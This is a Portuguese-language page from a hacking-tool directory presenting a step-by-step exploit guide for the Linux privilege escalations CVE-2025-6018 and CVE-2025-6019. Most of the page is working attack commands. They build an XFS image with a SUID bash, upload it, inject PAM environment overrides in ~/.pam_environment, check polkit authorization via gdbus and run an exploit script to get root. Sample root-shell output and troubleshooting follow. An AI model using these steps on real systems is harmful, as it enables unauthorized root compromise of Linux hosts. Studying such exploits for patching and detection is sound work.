Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — Exploração de escalonamento de privilégio passo a passo para CVE-2025-6018 e CVE-2025-6019 usando manipulação de imagem XFS e injeção de variável de ambiente PAM para obter acesso root em sistemas Linux. | Kitploit
Ferramentas/GitHubGitHub/ioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

Exploração de escalonamento de privilégio passo a passo para CVE-2025-6018 e CVE-2025-6019 usando manipulação de imagem XFS e injeção de variável de ambiente PAM para obter acesso root em sistemas Linux.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 6 mesesAinda não revisado

CVE-2025-6018 + CVE-2025-6019 Guia de Escalação de Privilégios

📋 Passos Rápidos de Exploração

Passo 1: Preparar Imagem XFS (Máquina Local)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

Passo 2: Carregar Arquivos para o Alvo

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Passo 3: Primeiro Login - Configurar PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Crítico: Sair da sessão (para ativar a configuração PAM)
exit

Passo 4: Segundo Login - Executar Escalação de Privilégios

root@kitploit:~
# Re-login via SSH (configuração PAM agora ativa)
ssh [email protected]

# Verificar se PAM está ativo (deve retornar "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Executar script de escalação de privilégios
bash exp.sh

✅ Indicadores de Sucesso

Se a exploração for bem-sucedida, você deve ver:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ FLAG ROOT                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Solução de Problemas

ProblemaSolução
CanReboot retorna

📌 Pontos Chave

  • ✅ Deve sair e entrar novamente: A configuração PAM só tem efeito em novas sessões
  • ✅ Verifique CanReboot: Confirme que retorna ('yes',) antes de executar o script
  • ✅ Use login SSH: Não use execução no estilo ssh -t user@host "cmd"

🐱 Guardião Gato

Se falhar, garanta que cada passo seja executado estritamente em ordem!

Baixar ferramenta
('no',)
Certifique-se de que saiu e entrou novamente (Passo 3)
Erro Not authorizedVerifique se o conteúdo de ~/.pam_environment está correto
bash SUID não encontradoRe-carregue xfs.image e verifique se o bit SUID está definido